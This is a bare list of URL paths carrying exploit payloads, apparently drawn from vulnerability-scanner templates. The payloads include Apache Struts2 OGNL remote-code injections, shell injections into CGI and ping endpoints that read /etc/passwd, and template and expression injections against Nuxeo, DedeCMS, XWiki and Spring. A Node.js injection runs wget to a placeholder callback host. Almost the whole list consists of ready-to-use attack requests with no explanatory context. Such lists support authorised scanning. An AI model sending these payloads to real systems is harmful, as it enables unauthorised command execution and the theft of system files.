/wp-content/plugins/wsecure/wsecure-config.php
/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test
/cgi-bin/;cat$IFS/etc/passwd
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/struts2-rest-showcase/orders/3
/orders/3
/command.cgi?cat%20/etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/meta
/nuxeo/login.jsp/pwn${31333333330+7}.xhtml
/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}
/node/1?_format=hal_json
/ReportServer/Pages/ReportViewer.aspx
/ucmdb-api/connect
/infusions/downloads/downloads.php?cat_id=${system(ls)}
?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23
/css/eonweb.css
/version.web
/index.jsp
/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(
/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view
/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki
/res/login.jsf?javax.faces.ViewState={{generate_java_gadget(
/-/media/doo-doo.ashx
/wd/hub
/html/2word?url={{file}}
/password.cgi
/dgn/dgn_tools/ping.php?ipdm=2;id;
/stat.jsp?cmd=chcp+437+%7c+dir
/search.php?searchtype=5
/notice/confirm.php?t=%3bping+-c+3+{{interactsh-url}}
/jolokia/list
/actuator/jolokia/list

/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
/{{paths}}/faq.php?cmd=echo%20-n%20{{num}}|md5sum
/{{paths}}/forum.php?x=shell_exec&y=echo%20-n%20{{num}}|md5sum
